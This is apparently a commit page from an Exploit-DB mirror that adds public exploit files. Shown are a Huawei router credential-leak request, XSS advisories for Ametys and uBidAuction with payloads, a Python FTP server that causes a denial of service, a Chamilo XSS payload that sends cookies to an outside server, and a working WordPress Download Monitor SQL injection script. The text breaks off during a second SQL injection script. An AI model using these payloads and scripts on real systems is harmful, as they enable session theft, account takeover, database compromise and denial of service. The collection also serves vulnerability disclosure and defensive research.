bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2022-02-03

Browse source 
17 changes to exploits/shellcodes

CONTPAQi(R) AdminPAQ 14.0.0 - Unquoted Service Path
Mozilla Firefox 67 - Array.pop JIT Type Confusion
Fetch Softworks Fetch FTP Client 5.8 - Remote CPU Consumption (Denial of Service)
Ametys CMS v4.4.1 - Cross Site Scripting (XSS)
uBidAuction v2.0.1 - 'Multiple' Cross Site Scripting (XSS)
Chamilo LMS 1.11.14 - Account Takeover
Wordpress Plugin Download Monitor WordPress V 4.4.4 - SQL Injection (Authenticated)
WordPress Plugin Domain Check 1.0.16 - Reflected Cross-Site Scripting (XSS) (Authenticated)
Wordpress Plugin 404 to 301 2.0.2 - SQL-Injection (Authenticated)
PHP Restaurants 1.0 - SQLi (Unauthenticated)
Moodle 3.11.4 - SQL Injection
Huawei DG8045 Router 1.0 - Credential Disclosure
PHP Unit 4.8.28 - Remote Code Execution (RCE) (Unauthenticated)
WordPress Plugin Contact Form Check Tester 1.0.2 - Broken Access Control
WordPress Plugin Product Slider for WooCommerce 1.13.21 - Cross Site Scripting (XSS)
WordPress Plugin Post Grid 2.1.1 - Cross Site Scripting (XSS)
WordPress Plugin Learnpress 4.1.4.1 - Arbitrary Image Renaming
This commit is contained in:
Offensive Security 2022-02-03 05:01:57 +00:00
parent 4dfb7acc62
commit ad453a2c73
18 changed files with 1925 additions and 0 deletions

42
exploits/hardware/webapps/50701.txt Normal file
View file

@ -0,0 +1,42 @@
# Title: Huawei DG8045 Router 1.0 - Credential Disclosure
# Date: 2020-06-24
# Author: Abdalrahman Gamal
# Vendor Homepage: www.huawei.com
# Version: dg8045
# HardwareVersion: VER.A
# CVE: N/A
#POC:
The default password of this router is the last 8 characters of the
device's serial number which exist in the back of the device.
An attacker can leak the serial number via the web app API like the
following:
************************Request************************
GET /api/system/deviceinfo HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.1/
X-Requested-With: XMLHttpRequest
Connection: close
************************Response************************
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
X-Download-Options: noopen
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Date: Thu, 24 Jun 2021 02:07 GMT+2
Connection: Keep-Alive
Content-Language: en
Content-Type: application/javascript
Content-Length: 141
while(1); /*{"DeviceName":"DG8045","SerialNumber":"21530369847SK9252081","ManufacturerOUI":"00E0FC","UpTime":81590,"HardwareVersion":"VER.A"}*/

255
exploits/java/webapps/50692.txt Normal file
View file

@ -0,0 +1,255 @@
# Exploit Title: Ametys CMS v4.4.1 - Cross Site Scripting (XSS)
# Exploit Author: Vulnerability-Lab
# Date: 21/01/2022
Document Title:
===============
Ametys v4.4.1 CMS - Cross Site Scripting Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2275
Release Date:
=============
2022-01-12
Vulnerability Laboratory ID (VL-ID):
====================================
2275
Common Vulnerability Scoring System:
====================================
5.2
Vulnerability Class:
====================
Cross Site Scripting - Persistent
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
Build powerful and stunning websites. Whether you need an advanced corporate website, a powerful landing page, a professionnal blog or
an event website, all the tools to make creative digital experiences are at your fingertips with Ametys. No coding skills needed.
Ametys make it easy for everyone to create and manage unified digital platform. Ametys delivers simple and intuitive interface with
a familiar ribbon Office style interface.
(Copy of the Homepage:https://www.ametys.org/community/en/ametys-platform/ametys-portal/overview.html )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent input validation web vulnerability in the Ametys v4.4.1 cms web-application.
Affected Product(s):
====================
Ametys
Product: Ametys v4.4.1 - Content Management System (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2021-07-24: Researcher Notification & Coordination (Security Researcher)
2021-07-25: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2022-01-12: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Restricted Authentication (User Privileges)
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Responsible Disclosure
Technical Details & Description:
================================
A persistent script code injection web vulnerability has been discovered in the official Ametys v4.4.1 cms web-application.
The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise
browser to web-application requests from the application-side.
The vulnerability is located in the input fields of the link text, small description and description in the add external link function.
The function is for example located in the link directory of the backend. Added links are listed with status and details.
Attackers with low privileges are able to add own malformed link with malicious script code in the marked vulnerable parameters.
After the inject the links are being displayed in the backend were the execute takes place on preview of the main link directory.
The attack vector of the vulnerability is persistent and the request method to inject is post.
Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects
to malicious source and persistent manipulation of affected application modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Link Directory (Add)
Vulnerable Function(s):
[+] add (External Link)
Vulnerable Parameter(s):
[+] Link Text
[+] Small description
[+] Description
Affected Module(s):
[+] Frontend (Main Link Listing)
[+] Backend (Link Directory)
Proof of Concept (PoC):
=======================
The persistent web vulnerability can be exploited by remote attackers with low privilged user accounts with low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Open the application path and login to the service as restricted user that allowed to create links
2. Open the link directory and create a new link (top|left)
3. Inject the test payloads to the link text, small description and description and save via post
4. On visit of the link directory the payloads executes in the backend listing or frontend
5. Successful reproduce of the persistent web vulnerability!
Payload(s):
<a onmouseover=alert(document.domain)>poc_link</a>
<a onmouseover=alert(document.cookie)>poc_link</a>
Vulnerable Source: Link Directory - Link (Add)
class="x-grid-cell-inner " style="text-align:left;"
<a onmouseover="alert(document.domain)">poc_link</a></div></td><td class="x-grid-cell x-grid-td x-grid-cell-gridcolumn-7478 x-unselectable"
style="width: 248px;" role="gridcell" tabindex="-1" data-columnid="gridcolumn-7478"><div unselectable="on" class="x-grid-cell-inner "
style="text-align:left;"><a onmouseover="alert(document.domain)">poc_link</a></div></td><td class="x-grid-cell x-grid-td x-grid-cell-gridcolumn-7479
x-unselectable" style="width: 247px;" role="gridcell" tabindex="-1" data-columnid="gridcolumn-7479"><div unselectable="on" class="x-grid-cell-inner "
style="text-align:left;">&nbsp;</div></td><td class="x-grid-cell x-grid-td x-grid-cell-gridcolumn-7480 x-grid-cell-last x-unselectable" style="width:
148px;" role="gridcell" tabindex="-1" data-columnid="gridcolumn-7480"><div unselectable="on" class="x-grid-cell-inner " style="text-align:left;">&nbsp;
</div></td></tr></tbody></table><table id="tableview-7474-record-105" role="presentation" data-boundview="tableview-7474" data-recordid="105"
data-recordindex="1" class="x-grid-item x-grid-item-selected x-grid-item-alt" style=";width:0" cellspacing="0" cellpadding="0"><tbody><tr class="
x-grid-row" role="row"><td class="x-grid-cell x-grid-td x-grid-cell-gridcolumn-7475 x-grid-cell-first x-unselectable" style="width: 396px;"
role="gridcell" tabindex="-1" data-columnid="gridcolumn-7475"><div unselectable="on" class="x-grid-cell-inner " style="text-align:left;">
<span class="a-grid-glyph ametysicon-link23"></span>test.de</div></td><td class="x-grid-cell x-grid-td x-grid-cell-gridcolumn-7476 x-unselectable"
style="width: 149px;" role="gridcell" tabindex="-1" data-columnid="gridcolumn-7476"><div unselectable="on" class="x-grid-cell-inner "
style="text-align:left;">Normal</div></td>
--- PoC Session Logs (POST) ---
https://ametys.localhost:8000.localhost:8000/cms/plugins/core-ui/servercomm/messages.xml
Host: ametys.localhost:8000.localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------1197812616356669894551519312
Content-Length: 798
Origin: https://ametys.localhost:8000.localhost:8000
Connection: keep-alive
Referer: https://ametys.localhost:8000.localhost:8000/cms/www/index.html
Cookie: JSESSIONID=A1DC067A1739FDFBC72BCF921A5AA655;
AmetysAuthentication=YW1ldHlzX2RlbW9fdXNlcnMjd2VibWFzdGVyI1A5WndHNTNzNmJhYlRWSDI;
JSESSIONID=A0EC6E56FC3A2131C9D24C33CB9CCAAA
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
content={"0":{"pluginOrWorkspace":"core-ui","responseType":"xml","url":"system-announcement/view.xml"},"1":
{"pluginOrWorkspace":"core-ui","responseType":"xml","url":"system-startuptime.xml"}}&context.parameters=
{"siteName":"www","skin":"demo","debug.mode":"false","populationContexts":["/sites/www","/sites-fo/www"],"user":
{"login":"testuser_restricted","population":"ametys_demo_users","firstname":"testuser_restricted","lastname":"User","fullname":"testuser_restricted User",
"email":"testuser_restricted@test.com","populationLabel":"Ametys Demo Users","locale":"en"}}
-
POST: HTTP/1.1 200
Server: Apache/2.4.29 (Ubuntu)
X-Cocoon-Version: 2.1.13
Ametys-Dispatched: true
Content-Type: text/xml
Via: 1.1 ametys.localhost:8000.localhost:8000
Vary: Accept-Encoding
Content-Encoding: gzip
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Language: fr
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the input fields in the external link add function of the link directory.
In a second step the input fields can be restricted for special chars to prevent further attacks.
As next step the output location were the links are being displayed (frontend & backend) should to be sanitized correctly.
Security Risk:
==============
The security risk of the persistent input validation web vulnerability in the ametys web-application cms is estimated as medium.
Credits & Authors:
==================
Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains:www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

70
exploits/macos/local/50696.py Executable file
View file

@ -0,0 +1,70 @@
# Exploit Title: Fetch Softworks Fetch FTP Client 5.8 - Remote CPU Consumption (Denial of Service)
# Exploit Author: liquidworm
#!/usr/bin/env python
#
#
# Fetch Softworks Fetch FTP Client 5.8 Remote CPU Consumption (Denial of Service)
#
#
# Vendor: Fetch Softworks
# Product web page: https://www.fetchsoftworks.com
# Affected version: 5.8.2 (5K1354)
#
# Summary: Fetch is a reliable, full-featured file transfer client for the
# Apple Macintosh whose user interface emphasizes simplicity and ease of use.
# Fetch supports FTP and SFTP, the most popular file transfer protocols on
# the Internet for compatibility with thousands of Internet service providers,
# web hosting companies, publishers, pre-press companies, and more.
#
# Desc: The application is prone to a DoS after receiving a long server response
# (more than 2K bytes) leading to 100% CPU consumption.
#
# --------------------------------------------------------------------------------
# ~/Desktop> ps ucp 3498
# USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND
# lqwrm 3498 100.0 0.5 60081236 54488 ?? R 5:44PM 4:28.97 Fetch-5K1354-266470421
# ~/Desktop>
# --------------------------------------------------------------------------------
#
# Tested on: macOS Monterey 12.2
# macOS Big Sur 11.6.2
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2022-5696
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5696.php
#
#
# 27.01.2022
#
import socket
host = '0.0.0.0'
port = 21
s = socket.socket()
s.bind((host, port))
s.listen(2)
print('Ascolto su', host, 'porta', port, '...')
consumptor = '220\x20'
consumptor += 'ftp.zeroscience.mk'
consumptor += '\x00' * 0x101E
consumptor += '\x0D\x0A'
while True:
try:
c, a = s.accept()
print('Connessione da', a)
print('CPU 100%, Memory++')
c.send(bytes(consumptor, 'UTF-8'))
c.send(b'Thricer OK, p\'taah\x0A\x0D')
print(c.recv(17))
except:
break

241
exploits/php/webapps/50693.txt Normal file
View file

@ -0,0 +1,241 @@
# Exploit Title: uBidAuction v2.0.1 - 'Multiple' Cross Site Scripting (XSS)
# Exploit Author: Vulnerability-Lab
# Date: 21/01/2022
Document Title:
===============
uBidAuction v2.0.1 - Multiple XSS Web Vulnerabilities
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2289
Release Date:
=============
2022-01-21
Vulnerability Laboratory ID (VL-ID):
====================================
2289
Common Vulnerability Scoring System:
====================================
5.4
Vulnerability Class:
====================
Cross Site Scripting - Non Persistent
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
uBidAuction is a powerful, scalable & fully-featured classic and bid auction software that lets create the ultimate
profitable online auctions website. It allows to manage entire online auction operation: create new auctions within
seconds, view members auctions and use the auction extension settings tool.
(Copy of the Homepage:https://www.apphp.com/codemarket/items/48/ubidauction-php-classic-and-bid-auctions-script )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple non-persistent cross site web vulnerabilities in the uBidAuction v2.0.1 script web-application.
Affected Product(s):
====================
ApPHP
Product: uBidAuction v2.0.1 - Auction Script (PHP) (Web-Application)
Product: ApPHP MVC Framework v1.2.2 (Framework)
Vulnerability Disclosure Timeline:
==================================
2022-09-01: Researcher Notification & Coordination (Security Researcher)
2022-09-02: Vendor Notification (Security Department)
2022-09-07: Vendor Response/Feedback (Security Department)
2022-**-**: Vendor Fix/Patch (Service Developer Team)
2022-**-**: Security Acknowledgements (Security Department)
2022-01-21: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Pre Auth (No Privileges or Session)
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Responsible Disclosure
Technical Details & Description:
================================
Multiple non-persistent cross site web vulnerabilities has been discovered in the official uBidAuction v2.0.1 script web-application.
The vulnerability allows remote attackers to inject own malicious script codes with non-persistent attack vector to compromise browser
to web-application requests from the client-side.
The cross site web vulnerabilities are located in the `date_created`, `date_from`, `date_to` and `created_at` parameters of the `filter` web module.
The injection point is located in the parameters and the execution occurs in the filter module. The request method to inject the malicious script
code is GET and the attack vector of the vulnerability is non-persistent on client-side.
Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects
to malicious source and non-persistent manipulation of affected application modules.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] ./orders/myOrders
[+] ./auctions/myAuctions/status/active
[+] ./auctions/myAuctions/status/loose
[+] ./posts/manage
[+] ./news/manage
[+] ./tickets/manage
[+] ./auctions/manage
[+] ./backend/mailingLog/manage
Vulnerable Parameter(s):
[+] date_created
[+] date_from
[+] date_to
[+] created_at
Affected Module(s):
[+] Filter
Proof of Concept (PoC):
=======================
The client-side cross site scripting web vulnerabilities can be exploited by remote attackers without account and with low user interaction.
For security demonstration or to reproduce the cross site web vulnerability follow the provided information and steps below to continue.
Exploitation: Payload
"><iframe+src%3Devil.source+onload</iframe>
Exploitation: PoC (Role: Member)
https://bid-auction.localhost:8080/orders/myOrders?order_number=1&created_at=%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert%28document.cookie%29%3E&status=0&but_filter=Filter
https://bid-auction.localhost:8080/auctions/myAuctions/status/active?auction_number=test1&name=test2&date_from="><iframe+src%3Devil.source+onload&date_to="><iframe+src%3Devil.source
https://bid-auction.localhost:8080/auctions/myAuctions/status/active?auction_number=1&name=a&date_from=%22%3E%3Ciframe+src%3Devil.source+onload&date_to=b&auction_type_id=&category_id=&status=&but_filter=Filter
https://bid-auction.localhost:8080/auctions/myAuctions/status/active?auction_number=1&name=a&date_from=a&date_to=%22%3E%3Ciframe+src%3Devil.source+onload&auction_type_id=&category_id=&status=&but_filter=Filter
https://bid-auction.localhost:8080/auctions/myAuctions/status/loose?auction_number=1&name=a&date_from=a&date_to=%22%3E%3Ciframe+src%3Devil.source+onload&auction_type_id=&category_id=&status=&but_filter=Filter
https://bid-auction.localhost:8080/auctions/myAuctions/status/loose?auction_number=1&name=a&date_from=%22%3E%3Ciframe+src%3Devil.source+onload&date_to=b&auction_type_id=&category_id=&status=&but_filter=Filter
Exploitation: PoC (Role: Admin)
https://bid-auction.localhost:8080/posts/manage?post_header=1&created_at=%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert%28document.cookie%29%3E&but_filter=Filter
https://bid-auction.localhost:8080/news/manage?news_header=1&created_at=%22%3E%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E&but_filter=Filter
https://bid-auction.localhost:8080/tickets/manage?topic=a&message=a&first_name%2Clast_name=a&departments=0&status=1&date_created=%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert%28document.cookie%29%3E&but_filter=Filter
https://bid-auction.localhost:8080/tickets/manage/status/opened?topic=a&message=a&first_name%2Clast_name=a&departments=0&status=0&date_created=%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert%28document.cookie%29%3E&but_filter=Filter
https://bid-auction.localhost:8080/auctions/manage?auction_number=1&name=a&date_from=%22%3E%3Ciframe+src%3Devil.source+onload&date_to=%22%3E%3Ciframe+src%3Devil.source+onload&auction_type_id=1&category_id=4&status=0&but_filter=Filter
https://bid-auction.localhost:8080/backend/mailingLog/manage?email_subject=a&email_content=b&email_from=c&email_to=d&sent_at=%22%3E%3Ciframe+src%3Devil.source+onload&status=&but_filter=Filter
Vulnerable Source: ./mailingLog
<div class="content">
<a href="posts/add" class="add-new">Add Post</a><div class="filtering-wrapper">
<form id="frmFilterPosts" action="posts/manage" method="get">
Post Header: <input id="post_header" style="width:100px;" maxlength="255" type="text" value="avd" name="post_header">
Date Created: <input id="created_at" maxlength="255" style="width:80px;" type="text" value=""><iframe src="evil.source" onload="alert(document.cookie)">" name="created_at" /><div class="buttons-wrapper">
<input name="" class="button white" onclick="jQuery(location).attr('href','https://bid-auction.localhost:8080/posts/manage');" type="button" value="Cancel" />
<input name="but_filter" type="submit" value="Filter" />
</div></form></div>
--- PoC Session Logs (GET) ---
https://bid-auction.localhost:8080/auctions/myAuctions/status/active?auction_number=test1&name=test2&date_from="><iframe+src%3Devil.source+onload&date_to="><iframe+src%3Devil.source+onload&auction_type_id=1&category_id=1&status=&but_filter=Filter
Host:www.bid-auction-script.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Referer:https://bid-auction.localhost:8080/auctions/myAuctions
Cookie: apphp_2j9tuqddrg=v1as9gj4qqhakbpgthnrs34np7
-
GET: HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 4542
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Reference(s):
https://bid-auction.localhost:8080/posts/manage
https://bid-auction.localhost:8080/orders/myOrders
https://bid-auction.localhost:8080/backend/mailingLog/manage
https://bid-auction.localhost:8080/auctions/myAuctions/status/loose
https://bid-auction.localhost:8080/auctions/myAuctions/status/active
Solution - Fix & Patch:
=======================
The vulnerability can be resolved by a filter or secure encode of the vulnerable date_created, date_from, date_to and created_at parameters.
Disallow the usage of special chars in the affected parameters on get method requests.
Sansitize the vulnerable output location to resolve the point of execution in the filter module.
Credits & Authors:
==================
Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains:www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

56
exploits/php/webapps/50694.txt Normal file
View file

@ -0,0 +1,56 @@
# Exploit Title: Chamilo LMS 1.11.14 - Account Takeover
# Date: July 21 2021
# Exploit Author: sirpedrotavares
# Vendor Homepage: https://chamilo.org
# Software Link: https://chamilo.org
# Version: Chamilo-lms-1.11.x
# Tested on: Chamilo-lms-1.11.x
# CVE: CVE-2021-37391
#Publication:
https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chamilo-lms-1.11.14-xss-vulnerabilities
Description: A user without privileges in Chamilo LMS 1.11.x can send an
invitation message to another user, e.g., the administrator, through
main/social/search.php,
main/inc/lib/social.lib.php and steal cookies or execute arbitrary code on
the administration side via a stored XSS vulnerability via social network
the send invitation feature. .
CVE ID: CVE-2021-37391
CVSS: Medium - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N
URL:
https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chamilo-lms-1.11.14-xss-vulnerabilities
Affected parameter: send private message - text field
Payload: <img src=x onerror=this.src='
http://yourserver/?c='+document.cookie>
Steps to reproduce:
1. Navigate to the social network menu
2. Select the victim profile
3. Add the payload on the text field
4. Submit the request and wait for the payload execution
*Impact:* By using this vulnerability, an unprivileged user can steal
cookies from an admin account or force the administrator to create an
account with admin privileges with an HTTP 302 redirect.
*Mitigation*: Update the Chamilo to the latest version.
*Fix*:
https://github.com/chamilo/chamilo-lms/commit/de43a77049771cce08ea7234c5c1510b5af65bc8
Com os meus melhores cumprimentos,
--
*Pedro Tavares*
Founder and Editor-in-Chief at seguranca-informatica.pt
Co-founder of CSIRT.UBI
Creator of 0xSI_f33d <https://feed.seguranca-informatica.pt/>
seguranca-informatica.pt | @sirpedrotavares
<https://twitter.com/sirpedrotavares> | 0xSI_f33d
<https://feed.seguranca-informatica.pt/>

88
exploits/php/webapps/50695.py Executable file
View file

@ -0,0 +1,88 @@
# Exploit Title: Wordpress Plugin Download Monitor WordPress V 4.4.4 - SQL Injection (Authenticated)
# Date 28.01.2022
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: https://www.download-monitor.com/
# Software Link: https://downloads.wordpress.org/plugin/download-monitor.4.4.4.zip
# Version: < 4.4.5
# Tested on: Ubuntu 20.04
# CVE: CVE-2021-24786
# CWE: CWE-89
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24786/README.md
'''
Description:
The Download Monitor WordPress plugin before 4.4.5 does not properly validate and escape the "orderby" GET parameter
before using it in a SQL statement when viewing the logs, leading to an SQL Injection issue
'''
# Banner:
banner = '''
___ __ ____ ___ ____ _ ____ _ _ _____ ___ __
/ __\/\ /\/__\ |___ \ / _ \___ \/ | |___ \| || |___ ( _ ) / /_
/ / \ \ / /_\_____ __) | | | |__) | |_____ __) | || |_ / // _ \| '_ \
/ /___ \ V //_|_____/ __/| |_| / __/| |_____/ __/|__ _/ /| (_) | (_) |
\____/ \_/\__/ |_____|\___/_____|_| |_____| |_|/_/ \___/ \___/
[+] Download Monitor - SQL-Injection
[@] Developed by Ron Jost (Hacker5preme)
'''
print(banner)
import argparse
import requests
from datetime import datetime
# User-Input:
my_parser = argparse.ArgumentParser(description='Wordpress Plugin RegistrationMagic - SQL Injection')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--PATH', type=str)
my_parser.add_argument('-u', '--USERNAME', type=str)
my_parser.add_argument('-p', '--PASSWORD', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
wp_path = args.PATH
username = args.USERNAME
password = args.PASSWORD
print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))
# Authentication:
session = requests.Session()
auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'
check = session.get(auth_url)
# Header:
header = {
'Host': target_ip,
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded',
'Origin': 'http://' + target_ip,
'Connection': 'close',
'Upgrade-Insecure-Requests': '1'
}
# Body:
body = {
'log': username,
'pwd': password,
'wp-submit': 'Log In',
'testcookie': '1'
}
auth = session.post(auth_url, headers=header, data=body)
# Exploit (WORKS ONLY IF ONE LOG EXISTS)
print('')
print ('[i] If the exploit does not work, log into wp-admin and add a file and download it to create a log')
print('')
# Generate payload for SQL-Injection
sql_injection_code = input('[+] SQL-INJECTION COMMAND: ')
sql_injection_code = sql_injection_code.replace(' ', '+')
exploitcode_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/edit.php?post_type=dlm_download&page=download-monitor-logs&orderby=download_date`' + sql_injection_code + '`user_id'
exploit = session.get(exploitcode_url)
print(exploit)
print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))

24
exploits/php/webapps/50697.txt Normal file
View file

@ -0,0 +1,24 @@
# Exploit Title: WordPress Plugin Domain Check 1.0.16 - Reflected Cross-Site Scripting (XSS) (Authenticated)
# Date: 30-10-2021
# Exploit Author: Ceylan Bozogullarindan
# Author Webpage: https://bozogullarindan.com
# Vendor Homepage: https://domaincheckplugin.com/
# Software Link: https://wordpress.org/plugins/domain-check/
# Version: 1.0.16
# Tested on: Linux
# CVE: CVE-2021-24926 (https://wpscan.com/vulnerability/8cc7cbbd-f74f-4f30-9483-573641fea733)
# Description:
Domain Check is a Wordpress plugin that allows you to see what domains and SSL certificates are coming up for expiration and to quickly locate the coupons, coupon codes, and deals from your favorite sites before renewing.
An authenticated user is able to inject arbitrary Javascript or HTML code to the "Domain Check Profile" interface available in settings page of the plugin, due to incorrect sanitization of user-supplied data and achieve a Reflected Cross-Site Scripting attack against the administrators. The plugin versions prior to 1.0.16 are affected by this vulnerability.
The details of the discovery are given below.
# Steps To Reproduce:
1. Just visit the following page after signing in the administrator panel: http://vulnerable-wordpress-website/wp-admin/admin.php?page=domain-check-profile&domain=hacked.foo<script>alert(1)</script>
2. The XSS will be triggered on the settings page.

112
exploits/php/webapps/50698.py Executable file
View file

@ -0,0 +1,112 @@
# Exploit Title: Wordpress Plugin 404 to 301 2.0.2 - SQL-Injection (Authenticated)
# Date 30.01.2022
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: https://de.wordpress.org/plugins/404-to-301/
# Software Link: https://downloads.wordpress.org/plugin/404-to-301.2.0.2.zip
# Version: <= 2.0.2
# Tested on: Ubuntu 20.04
# CVE: CVE-2015-9323
# CWE: CWE-89
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2015-9323/README.md
'''
Description:
The 404-to-301 plugin before 2.0.3 for WordPress has SQL injection.
'''
banner = '''
.o88b. db db d88888b .d888b. .d88b. db ooooo .d888b. d8888b. .d888b. d8888b.
d8P Y8 88 88 88' VP `8D .8P 88. o88 8P~~~~ 88' `8D VP `8D VP `8D VP `8D
